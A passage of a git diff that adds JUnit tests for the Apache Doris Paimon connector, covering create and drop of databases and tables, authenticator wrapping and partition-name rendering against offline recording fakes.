    All tests run offline against the recording seam fake (null real Catalog). + */ +public class PaimonConnectorMetadataDbDdlTest { + + /** Metadata with default (filesystem) flavor: catalogProperties has no paimon.catalog.type. */ + private static PaimonConnectorMetadata filesystemMetadata(RecordingPaimonCatalogOps ops, + RecordingConnectorContext ctx) { + return new PaimonConnectorMetadata(ops, Collections.emptyMap(), ctx); + } + + /** Metadata with HMS flavor: catalogProperties carries paimon.catalog.type=hms. */ + private static PaimonConnectorMetadata hmsMetadata(RecordingPaimonCatalogOps ops, + RecordingConnectorContext ctx) { + Map catalogProps = new HashMap<>(); + catalogProps.put(PaimonConnectorProperties.PAIMON_CATALOG_TYPE, PaimonConnectorProperties.HMS); + return new PaimonConnectorMetadata(ops, catalogProps, ctx); + } + + private static Map dbProps() { + Map props = new HashMap<>(); + props.put("location", "/wh/db"); + return props; + } + + // ==================== supportsCreateDatabase ==================== + + @Test + public void supportsCreateDatabaseIsTrue() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + + // WHY: supportsCreateDatabase()==true is the gate that makes + // PluginDrivenExternalCatalog.createDb run the remote IF-NOT-EXISTS precheck AND route to + // createDatabase; if it were false, CREATE DATABASE would fall through to "not supported". + // MUTATION: returning false (the SPI default) makes this red and breaks the FE routing. + Assertions.assertTrue(filesystemMetadata(ops, ctx).supportsCreateDatabase()); + } + + // ==================== createDatabase: HMS-only-props gate ==================== + + @Test + public void createDatabaseRejectsPropsForNonHmsFlavorBeforeAuthenticator() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + + // WHY (legacy performCreateDb:103-109): only the HMS catalog type accepts CREATE DATABASE + // properties; every other flavor (here: default filesystem) must reject non-empty props. + // The gate is a pure local arg check, so it must run BEFORE executeAuthenticated and before + // any seam call. MUTATION: if the gate were removed or placed AFTER executeAuthenticated, + // authCount would be 1 and the seam log would contain createDatabase -> the two assertions + // below (authCount==0, log empty) flip red. + DorisConnectorException ex = Assertions.assertThrows(DorisConnectorException.class, + () -> filesystemMetadata(ops, ctx).createDatabase(null, "db1", dbProps())); + Assertions.assertTrue(ex.getMessage().contains("filesystem"), + "rejection message must name the offending catalog type"); + Assertions.assertEquals(0, ctx.authCount, + "local arg-check rejection must abort BEFORE entering the authenticator"); + Assertions.assertTrue(ops.log.isEmpty(), + "local arg-check rejection must never reach the remote catalog seam"); + } + + @Test + public void createDatabaseAllowsPropsForHmsFlavor() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + Map props = dbProps(); + + hmsMetadata(ops, ctx).createDatabase(null, "db1", props); + + // WHY: for the HMS flavor the gate must NOT fire; the props must be forwarded verbatim to + // the seam, under exactly one authenticator scope. MUTATION: if the gate fired for HMS, this + // would throw; if the props were dropped, lastCreatedDbProps would differ. + Assertions.assertEquals(Collections.singletonList("createDatabase:db1"), ops.log); + Assertions.assertEquals("db1", ops.lastCreatedDb); + Assertions.assertEquals(props, ops.lastCreatedDbProps); + Assertions.assertFalse(ops.lastCreateDbIgnoreIfExists, + "ignoreIfExists must be false: FE already did the IF NOT EXISTS short-circuit"); + Assertions.assertEquals(1, ctx.authCount); + } + + @Test + public void createDatabaseAllowsEmptyPropsForFilesystemFlavor() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + + filesystemMetadata(ops, ctx).createDatabase(null, "db1", Collections.emptyMap()); + + // WHY: the gate only rejects NON-EMPTY props on non-HMS flavors; an empty-props CREATE + // DATABASE on filesystem is the common case and must succeed and reach the seam. + // MUTATION: a gate that also rejected empty props (e.g. dropped the !isEmpty() guard) would + // throw here. + Assertions.assertEquals(Collections.singletonList("createDatabase:db1"), ops.log); + Assertions.assertEquals("db1", ops.lastCreatedDb); + Assertions.assertEquals(1, ctx.authCount); + } + + // ==================== createDatabase: exception wrap + authenticator ==================== + + @Test + public void createDatabaseWrapsDatabaseAlreadyExistAsDorisConnectorException() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.throwDatabaseAlreadyExist = true; + RecordingConnectorContext ctx = new RecordingConnectorContext(); + + // WHY: fe-core only understands DorisConnectorException; a raw paimon + // DatabaseAlreadyExistException leaking out would bypass the engine's DDL error handling. + // MUTATION: removing the try/catch wrap lets the raw paimon exception escape -> red. + DorisConnectorException ex = Assertions.assertThrows(DorisConnectorException.class, + () -> filesystemMetadata(ops, ctx).createDatabase(null, "db1", Collections.emptyMap())); + Assertions.assertTrue(ex.getMessage().contains("db1"), + "wrapped message must name the database"); + } + + @Test + public void createDatabaseRunsSeamInsideAuthenticator() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + ctx.failAuth = true; + + // WHY (D7=B legacy parity): the remote create must run inside executeAuthenticated so the + // FE-injected auth context applies. When auth fails, the seam call must NOT have run. + // This uses the NON-gated path (filesystem + empty props) so the gate cannot mask the test. + // MUTATION: if createDatabase called catalogOps.createDatabase directly instead of inside + // context.executeAuthenticated, the log would contain "createDatabase:db1" despite the auth + // failure -> the log-empty assertion below would fail. + Assertions.assertThrows(DorisConnectorException.class, + () -> filesystemMetadata(ops, ctx).createDatabase(null, "db1", Collections.emptyMap())); + Assertions.assertTrue(ops.log.isEmpty(), + "auth failure must abort BEFORE the seam createDatabase call runs"); + Assertions.assertEquals(1, ctx.authCount, + "createDatabase must enter executeAuthenticated exactly once"); + } + + // ==================== dropDatabase ==================== + + @Test + public void dropDatabaseForceEnumeratesAndCascades() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.tables = Arrays.asList("t1", "t2"); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + + filesystemMetadata(ops, ctx).dropDatabase(null, "db1", false, true); + + // WHY (legacy performDropDb:147-163): force-drop must FIRST enumerate the db's tables and + // drop each (belt), THEN drop the db passing force as paimon's native cascade (suspenders). + // The whole op runs under ONE authenticator scope. The exact log order pins both the + // enumerate-then-drop sequencing and the native cascade=true forwarding. + // MUTATION: if the enumerate-loop were skipped, the dropTable entries vanish; if force + // weren't forwarded as cascade, the last entry would read cascade=false; if each remote call + // got its own authenticator, authCount would be > 1. + Assertions.assertEquals( + Arrays.asList("listTables:db1", "dropTable:db1.t1", "dropTable:db1.t2", + "dropDatabase:db1,cascade=true"), + ops.log); + Assertions.assertEquals("db1", ops.lastDroppedDb); + Assertions.assertTrue(ops.lastDropCascade, "force must be forwarded as native cascade=true"); + Assertions.assertTrue(ops.lastDropTableIgnoreIfNotExists, + "cascaded per-table drops must be idempotent (ignoreIfNotExists=true)"); + Assertions.assertEquals(1, ctx.authCount, + "the whole force-drop op runs under exactly one authenticator scope"); + } + + @Test + public void dropDatabaseForceOnEmptyDbStillCascades() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.tables = Collections.emptyList(); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + + filesystemMetadata(ops, ctx).dropDatabase(null, "db1", false, true); + + // WHY: the FORCE enumerate-loop must no-op safely when the database has no tables and + // still perform the native cascade drop -- an empty db is the common force-drop case. + // MUTATION: if the loop skipped the trailing dropDatabase when tables is empty, or + // emitted a spurious dropTable, the exact-log assertion would fail. + Assertions.assertEquals( + Arrays.asList("listTables:db1", "dropDatabase:db1,cascade=true"), ops.log); + Assertions.assertTrue(ops.lastDropCascade, "force must be forwarded as native cascade=true"); + Assertions.assertEquals(1, ctx.authCount, + "the whole force-drop op runs under exactly one authenticator scope"); + } + + @Test + public void dropDatabaseNonForceSkipsEnumerateLoop() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.tables = Arrays.asList("t1", "t2"); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + + filesystemMetadata(ops, ctx).dropDatabase(null, "db1", false, false); + + // WHY: without force, the enumerate-loop must NOT run (no listTables / dropTable) and the + // db drop must pass cascade=false, so paimon throws DatabaseNotEmptyException on a non-empty + // db rather than silently deleting tables. MUTATION: if force weren't honored (loop always + // runs), the log would contain listTables/dropTable; if cascade weren't false, the last + // entry would read cascade=true. + Assertions.assertEquals( + Collections.singletonList("dropDatabase:db1,cascade=false"), ops.log); + Assertions.assertFalse(ops.lastDropCascade); + Assertions.assertEquals(1, ctx.authCount); + } + + @Test + public void dropDatabaseWrapsDatabaseNotEmptyAsDorisConnectorException() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.throwDatabaseNotEmpty = true; + RecordingConnectorContext ctx = new RecordingConnectorContext(); + + // WHY: a non-force DROP DATABASE on a non-empty db surfaces paimon's + // DatabaseNotEmptyException, which must be wrapped so fe-core's DDL error handling applies. + // MUTATION: removing the try/catch wrap lets the raw paimon exception escape -> red. + DorisConnectorException ex = Assertions.assertThrows(DorisConnectorException.class, + () -> filesystemMetadata(ops, ctx).dropDatabase(null, "db1", false, false)); + Assertions.assertTrue(ex.getMessage().contains("db1"), + "wrapped message must name the database"); + } + + @Test + public void dropDatabaseRunsSeamInsideAuthenticator() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + ctx.failAuth = true; + + // WHY (D7=B legacy parity): the remote drop must run inside executeAuthenticated. When auth + // fails, NO seam call (neither enumerate nor db drop) must run. + // MUTATION: if dropDatabase called the seam directly instead of inside + // context.executeAuthenticated, the log would be non-empty despite the auth failure. + Assertions.assertThrows(DorisConnectorException.class, + () -> filesystemMetadata(ops, ctx).dropDatabase(null, "db1", false, true)); + Assertions.assertTrue(ops.log.isEmpty(), + "auth failure must abort BEFORE any seam drop call runs"); + Assertions.assertEquals(1, ctx.authCount); + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataDdlTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataDdlTest.java new file mode 100644 index 00000000000000..d1993f705802d0 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataDdlTest.java @@ -0,0 +1,267 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.doris.connector.api.ConnectorColumn; +import org.apache.doris.connector.api.ConnectorType; +import org.apache.doris.connector.api.DorisConnectorException; +import org.apache.doris.connector.api.ddl.ConnectorCreateTableRequest; +import org.apache.doris.connector.api.ddl.ConnectorPartitionField; +import org.apache.doris.connector.api.ddl.ConnectorPartitionSpec; + +import org.apache.paimon.schema.Schema; +import org.apache.paimon.types.DataTypeRoot; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Arrays; +import java.util.Collections; +import java.util.HashMap; +import java.util.List; +import java.util.Map; + +/** + * T13 DDL tests for {@link PaimonConnectorMetadata#createTable} / {@link #dropTable}, + * pinning (1) the delegation to the {@link PaimonCatalogOps} seam with the correct Identifier, + * Schema and {@code ignoreIfExists}/{@code ignoreIfNotExists} flags, (2) that raw paimon checked + * exceptions are wrapped as {@link DorisConnectorException}, and (3) D7=B: every remote DDL call + * is executed INSIDE {@link org.apache.doris.connector.spi.ConnectorContext#executeAuthenticated}. + * + *

    All tests run offline against the recording seam fake (null real Catalog). + */ +public class PaimonConnectorMetadataDdlTest { + + private static PaimonConnectorMetadata metadata(RecordingPaimonCatalogOps ops, + RecordingConnectorContext ctx) { + return new PaimonConnectorMetadata(ops, Collections.emptyMap(), ctx); + } + + /** Builds a CREATE TABLE request: db1.t1, columns (id INT, name STRING), partitioned by id, ifNotExists. */ + private static ConnectorCreateTableRequest request(boolean ifNotExists) { + List columns = Arrays.asList( + new ConnectorColumn("id", ConnectorType.of("INT"), "id col", false, null), + new ConnectorColumn("name", ConnectorType.of("STRING"), null, true, null)); + ConnectorPartitionSpec partitionSpec = new ConnectorPartitionSpec( + ConnectorPartitionSpec.Style.IDENTITY, + Collections.singletonList( + new ConnectorPartitionField("id", "identity", Collections.emptyList())), + Collections.emptyList()); + Map props = new HashMap<>(); + props.put("primary-key", "id"); + return ConnectorCreateTableRequest.builder() + .dbName("db1") + .tableName("t1") + .columns(columns) + .partitionSpec(partitionSpec) + .properties(props) + .ifNotExists(ifNotExists) + .build(); + } + + /** Builds a CREATE TABLE request whose partition spec uses a NON-identity transform (bucket). */ + private static ConnectorCreateTableRequest requestWithNonIdentityPartition() { + List columns = Arrays.asList( + new ConnectorColumn("id", ConnectorType.of("INT"), "id col", false, null), + new ConnectorColumn("name", ConnectorType.of("STRING"), null, true, null)); + ConnectorPartitionSpec partitionSpec = new ConnectorPartitionSpec( + ConnectorPartitionSpec.Style.TRANSFORM, + Collections.singletonList( + new ConnectorPartitionField("id", "bucket", Collections.singletonList(16))), + Collections.emptyList()); + return ConnectorCreateTableRequest.builder() + .dbName("db1") + .tableName("t1") + .columns(columns) + .partitionSpec(partitionSpec) + .properties(new HashMap<>()) + .ifNotExists(false) + .build(); + } + + private static PaimonTableHandle handle() { + return new PaimonTableHandle("db1", "t1", + Collections.singletonList("id"), Collections.singletonList("id")); + } + + // ==================== createTable ==================== + + @Test + public void createTableDelegatesToSeamWithBuiltSchemaAndIfNotExists() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + + metadata(ops, ctx).createTable(null, request(true)); + + // WHY: createTable is the only path that materializes a Doris CREATE TABLE on the remote + // Paimon catalog; it must call the seam exactly once with the request's Identifier and the + // PaimonSchemaBuilder-built Schema, and forward request.isIfNotExists() as paimon's + // ignoreIfExists so paimon's idempotency semantics (no-op vs throw) match the user's clause. + // MUTATION: dropping the createTable delegation, or passing a wrong Identifier / false + // instead of request.isIfNotExists(), flips one of these assertions red. + Assertions.assertEquals(Collections.singletonList("createTable:db1.t1"), ops.log); + Assertions.assertEquals("db1", ops.lastCreatedTableId.getDatabaseName()); + Assertions.assertEquals("t1", ops.lastCreatedTableId.getObjectName()); + Assertions.assertTrue(ops.lastCreateTableIgnoreIfExists, + "request.isIfNotExists()==true must be forwarded as paimon ignoreIfExists"); + + // Schema must reflect the request: 2 columns in order, identity partition key id, pk id. + Schema schema = ops.lastCreatedSchema; + Assertions.assertEquals(Arrays.asList("id", "name"), + Arrays.asList(schema.fields().get(0).name(), schema.fields().get(1).name())); + Assertions.assertEquals(DataTypeRoot.INTEGER, schema.fields().get(0).type().getTypeRoot()); + Assertions.assertEquals(DataTypeRoot.VARCHAR, schema.fields().get(1).type().getTypeRoot()); + Assertions.assertEquals(Collections.singletonList("id"), schema.partitionKeys()); + Assertions.assertEquals(Collections.singletonList("id"), schema.primaryKeys()); + } + + @Test + public void createTableForwardsIfNotExistsFalse() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + + metadata(ops, ctx).createTable(null, request(false)); + + // WHY: when the user omits IF NOT EXISTS, paimon must be told ignoreIfExists=false so a + // pre-existing table surfaces as TableAlreadyExistException rather than being silently + // no-op'd. MUTATION: hardcoding true (always-idempotent) makes this red. + Assertions.assertFalse(ops.lastCreateTableIgnoreIfExists); + } + + @Test + public void createTableWrapsTableAlreadyExistAsDorisConnectorException() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.throwTableAlreadyExist = true; + RecordingConnectorContext ctx = new RecordingConnectorContext(); + + // WHY: fe-core only understands DorisConnectorException; a raw paimon + // TableAlreadyExistException leaking out would bypass the engine's DDL error handling. + // MUTATION: removing the try/catch wrap lets the raw paimon exception escape (wrapped by + // executeAuthenticated as a generic Exception) -> assertThrows(DorisConnectorException) red. + DorisConnectorException ex = Assertions.assertThrows(DorisConnectorException.class, + () -> metadata(ops, ctx).createTable(null, request(false))); + Assertions.assertTrue(ex.getMessage().contains("db1.t1"), + "wrapped message must name the table"); + } + + @Test + public void createTableRunsSeamInsideAuthenticator() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + ctx.failAuth = true; + + // WHY (D7=B legacy parity): the remote create must run inside executeAuthenticated so the + // FE-injected auth context (e.g. Kerberos UGI) applies; legacy PaimonMetadataOps wrapped + // every remote DDL call. When auth fails, the seam call must NOT have run. + // MUTATION: if createTable called catalogOps.createTable directly instead of inside + // context.executeAuthenticated, the seam call would run despite the auth failure and the + // log would contain "createTable:db1.t1" -> the log-empty assertion below would fail. + Assertions.assertThrows(DorisConnectorException.class, + () -> metadata(ops, ctx).createTable(null, request(true))); + Assertions.assertTrue(ops.log.isEmpty(), + "auth failure must abort BEFORE the seam createTable call runs"); + Assertions.assertEquals(1, ctx.authCount, + "createTable must enter executeAuthenticated exactly once"); + } + + @Test + public void createTableEntersAuthenticatorExactlyOnceOnHappyPath() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + + metadata(ops, ctx).createTable(null, request(true)); + + // WHY: confirms the happy path also goes through the authenticator (not just the failure + // path), and exactly once. MUTATION: an un-wrapped direct seam call leaves authCount==0. + Assertions.assertEquals(1, ctx.authCount); + Assertions.assertEquals(Collections.singletonList("createTable:db1.t1"), ops.log); + } + + @Test + public void createTableBuildsSchemaOutsideAuthenticatorSoSchemaFailureIsRaw() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + + // WHY: createTable must build the schema OUTSIDE the authenticator try, so a schema + // validation failure surfaces its own precise message and never touches the remote + // catalog / auth context. PaimonSchemaBuilder rejects a non-identity partition transform + // (here: bucket) with a raw DorisConnectorException whose message names the transform. + // MUTATION: if PaimonSchemaBuilder.build were moved INSIDE context.executeAuthenticated's + // try, the DorisConnectorException would be re-wrapped as "Failed to create Paimon table" + // (the contains-false assertion fails) and authCount would be 1 (the ==0 assertion fails). + DorisConnectorException ex = Assertions.assertThrows(DorisConnectorException.class, + () -> metadata(ops, ctx).createTable(null, requestWithNonIdentityPartition())); + Assertions.assertFalse(ex.getMessage().contains("Failed to create Paimon table"), + "schema-builder failure must surface its RAW message, not the createTable wrapper"); + Assertions.assertEquals(0, ctx.authCount, + "schema build failure must abort BEFORE entering the authenticator"); + Assertions.assertTrue(ops.log.isEmpty(), + "schema build failure must never reach the remote catalog seam"); + } + + // ==================== dropTable ==================== + + @Test + public void dropTableDelegatesToSeamIdempotently() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + + metadata(ops, ctx).dropTable(null, handle()); + + // WHY: the SPI dropTable is handle-based with no ifExists flag (fe-core pre-resolves the + // handle), so the remote drop must be issued idempotently (ignoreIfNotExists=true) to mirror + // MaxCompute and avoid a spurious failure on a concurrently-vanished table. + // MUTATION: passing false (or a wrong Identifier) flips one of these assertions red. + Assertions.assertEquals(Collections.singletonList("dropTable:db1.t1"), ops.log); + Assertions.assertEquals("db1", ops.lastDroppedTableId.getDatabaseName()); + Assertions.assertEquals("t1", ops.lastDroppedTableId.getObjectName()); + Assertions.assertTrue(ops.lastDropTableIgnoreIfNotExists, + "drop must be idempotent: ignoreIfNotExists=true"); + Assertions.assertEquals(1, ctx.authCount); + } + + @Test + public void dropTableWrapsTableNotExistAsDorisConnectorException() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.throwTableNotExistOnDrop = true; + RecordingConnectorContext ctx = new RecordingConnectorContext(); + + // WHY: a raw paimon TableNotExistException must be wrapped so fe-core's DDL error handling + // applies. MUTATION: removing the try/catch wrap lets the raw exception escape -> red. + DorisConnectorException ex = Assertions.assertThrows(DorisConnectorException.class, + () -> metadata(ops, ctx).dropTable(null, handle())); + Assertions.assertTrue(ex.getMessage().contains("db1.t1"), + "wrapped message must name the table"); + } + + @Test + public void dropTableRunsSeamInsideAuthenticator() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + ctx.failAuth = true; + + // WHY (D7=B legacy parity): like createTable, the remote drop must run inside + // executeAuthenticated. MUTATION: if dropTable called catalogOps.dropTable directly instead + // of inside context.executeAuthenticated, the log would contain "dropTable:db1.t1" despite + // the auth failure -> the log-empty assertion below would fail. + Assertions.assertThrows(DorisConnectorException.class, + () -> metadata(ops, ctx).dropTable(null, handle())); + Assertions.assertTrue(ops.log.isEmpty(), + "auth failure must abort BEFORE the seam dropTable call runs"); + Assertions.assertEquals(1, ctx.authCount); + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataPartitionTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataPartitionTest.java new file mode 100644 index 00000000000000..bc56ef65b515a4 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataPartitionTest.java @@ -0,0 +1,214 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.doris.connector.api.ConnectorPartitionInfo; + +import org.apache.paimon.partition.Partition; +import org.apache.paimon.types.DataTypes; +import org.apache.paimon.types.RowType; +import org.apache.paimon.utils.DateTimeUtils; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Arrays; +import java.util.Collections; +import java.util.LinkedHashMap; +import java.util.List; +import java.util.Map; +import java.util.Optional; + +/** + * Partition-listing tests for {@link PaimonConnectorMetadata} (P5-T08), pinning byte-parity with + * the legacy fe-core display-name logic ({@code PaimonUtil.generatePartitionInfo}). + * + *

    Like {@link PaimonConnectorMetadataTest}, these run entirely offline against the + * {@link RecordingPaimonCatalogOps} seam fake (null real catalog). The DATE epoch-day {@code 19723} + * deliberately renders to {@code 2024-01-01} via {@link DateTimeUtils#formatDate(int)}; the expected + * string is computed from the same SDK call so the assertion can never drift from the production + * formatter. + */ +public class PaimonConnectorMetadataPartitionTest { + + private static final int DT_EPOCH_DAY = 19723; // DateTimeUtils.formatDate(19723) == 2024-01-01 + + private static PaimonConnectorMetadata metadataWith(RecordingPaimonCatalogOps ops) { + // Read-path tests ignore the context; a default RecordingConnectorContext is a no-op wrapper. + return new PaimonConnectorMetadata(ops, Collections.emptyMap(), new RecordingConnectorContext()); + } + + /** Two-key partitioned table: dt (DATE) + region (STRING). */ + private static RowType dtRegionRowType() { + return RowType.builder() + .field("id", DataTypes.INT()) + .field("dt", DataTypes.DATE()) + .field("region", DataTypes.STRING()) + .build(); + } + + private static PaimonTableHandle dtRegionHandle(FakePaimonTable table) { + PaimonTableHandle handle = new PaimonTableHandle( + "db1", "t1", Arrays.asList("dt", "region"), Collections.emptyList()); + handle.setPaimonTable(table); + return handle; + } + + /** Real Paimon Partition fixture via the verified public 6-arg ctor. */ + private static Partition partition(Map spec, long recordCount, + long fileSizeInBytes, long lastFileCreationTime) { + return new Partition(spec, recordCount, fileSizeInBytes, /*fileCount*/ 1, lastFileCreationTime, + /*done*/ true); + } + + @Test + public void legacyNameTrueRendersDateKeyAndCarriesStats() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + FakePaimonTable table = new FakePaimonTable( + "t1", dtRegionRowType(), Arrays.asList("dt", "region"), Collections.emptyList()); + table.setOptions(Collections.singletonMap("partition.legacy-name", "true")); + ops.table = table; + Map spec = new LinkedHashMap<>(); + spec.put("dt", String.valueOf(DT_EPOCH_DAY)); + spec.put("region", "cn"); + ops.partitions = Collections.singletonList(partition(spec, 42L, 1024L, 1700000000000L)); + + PaimonTableHandle handle = dtRegionHandle(table); + + List names = metadataWith(ops).listPartitionNames(null, handle); + List infos = metadataWith(ops).listPartitions(null, handle, Optional.empty()); + + String expectedName = "dt=" + DateTimeUtils.formatDate(DT_EPOCH_DAY) + "/region=cn"; + // WHY: with legacy-name=true, Paimon stores DATE as an epoch-day int; the display name MUST + // render it through the SAME DateTimeUtils.formatDate the legacy fe-core used (19723 -> + // 2024-01-01), or the partition name diverges from every pre-migration cache/show output. + // MUTATION: dropping the `legacyName && isDate` branch (appending the raw int "19723") + // -> name becomes "dt=19723/region=cn" -> red. + Assertions.assertEquals(Collections.singletonList(expectedName), names); + + Assertions.assertEquals(1, infos.size()); + ConnectorPartitionInfo info = infos.get(0); + Assertions.assertEquals(expectedName, info.getPartitionName()); + // WHY: lastModifiedMillis must carry Partition.lastFileCreationTime() (NOT recordCount or + // sizeBytes); the 6-arg ctor arg order is load-bearing for downstream freshness checks. + // MUTATION: swapping the lastFileCreationTime arg for any other stat -> red. + Assertions.assertEquals(1700000000000L, info.getLastModifiedMillis()); + // WHY: rowCount/sizeBytes carry the Paimon partition stats verbatim. + // MUTATION: hardcoding UNKNOWN / swapping the two -> red. + Assertions.assertEquals(42L, info.getRowCount()); + Assertions.assertEquals(1024L, info.getSizeBytes()); + // WHY: partitionValues must be the RAW spec (epoch-day int, NOT date-rendered) because + // downstream indexes partitions by raw remote keys. MUTATION: storing the rendered name + // values (e.g. "2024-01-01") -> red. + Assertions.assertEquals(String.valueOf(DT_EPOCH_DAY), info.getPartitionValues().get("dt")); + Assertions.assertEquals("cn", info.getPartitionValues().get("region")); + } + + @Test + public void legacyNameFalseDoesNotRenderDateKey() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + FakePaimonTable table = new FakePaimonTable( + "t1", dtRegionRowType(), Arrays.asList("dt", "region"), Collections.emptyList()); + table.setOptions(Collections.singletonMap("partition.legacy-name", "false")); + ops.table = table; + Map spec = new LinkedHashMap<>(); + // With legacy-name=false the remote already stores the human-readable date string. + spec.put("dt", "2024-01-01"); + spec.put("region", "cn"); + ops.partitions = Collections.singletonList(partition(spec, 1L, 1L, 1L)); + + List names = metadataWith(ops).listPartitionNames(null, dtRegionHandle(table)); + + // WHY: with legacy-name=false the DATE value is ALREADY a date string and must pass through + // unchanged; re-rendering it (formatDate would parse "2024-01-01" as an int and throw, or + // mangle the value) breaks parity. MUTATION: always taking the DATE-render branch -> red + // (NumberFormatException on "2024-01-01"). + Assertions.assertEquals(Collections.singletonList("dt=2024-01-01/region=cn"), names); + } + + @Test + public void listPartitionValuesUsesRequestedColumnOrderWithRawValues() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + FakePaimonTable table = new FakePaimonTable( + "t1", dtRegionRowType(), Arrays.asList("dt", "region"), Collections.emptyList()); + table.setOptions(Collections.singletonMap("partition.legacy-name", "true")); + ops.table = table; + // Paimon native spec order is dt, region; the request asks for the reversed order. + Map spec = new LinkedHashMap<>(); + spec.put("dt", String.valueOf(DT_EPOCH_DAY)); + spec.put("region", "cn"); + ops.partitions = Collections.singletonList(partition(spec, 1L, 1L, 1L)); + + List> values = metadataWith(ops) + .listPartitionValues(null, dtRegionHandle(table), Arrays.asList("region", "dt")); + + // WHY: the partition_values() TVF contract requires the inner list order to match the + // REQUESTED partitionColumns order (region, dt), NOT Paimon's native spec order (dt, + // region), and to carry RAW values (the epoch-day int for dt, never the rendered date). + // MUTATION: iterating spec.entrySet()/keySet() instead of partitionColumns -> [19723, cn] + // instead of [cn, 19723] -> red; rendering dt -> "2024-01-01" instead of raw -> red. + Assertions.assertEquals( + Collections.singletonList(Arrays.asList("cn", String.valueOf(DT_EPOCH_DAY))), + values); + } + + @Test + public void nonPartitionedHandleReturnsEmptyWithoutSeamCall() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + FakePaimonTable table = new FakePaimonTable( + "t1", RowType.builder().field("id", DataTypes.INT()).build(), + Collections.emptyList(), Collections.emptyList()); + ops.table = table; + // Empty partitionKeys == unpartitioned table. + PaimonTableHandle handle = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()); + handle.setPaimonTable(table); + + PaimonConnectorMetadata metadata = metadataWith(ops); + + // WHY: legacy never lists partitions for unpartitioned tables (PaimonPartitionInfoLoader + // returns EMPTY when partitionColumns is empty). All three SPI methods must short-circuit + // to empty BEFORE touching the catalog seam. MUTATION: removing the empty-partitionKeys + // guard -> a listPartitions seam call is logged -> red. + Assertions.assertTrue(metadata.listPartitionNames(null, handle).isEmpty()); + Assertions.assertTrue(metadata.listPartitions(null, handle, Optional.empty()).isEmpty()); + Assertions.assertTrue( + metadata.listPartitionValues(null, handle, Collections.singletonList("id")).isEmpty()); + 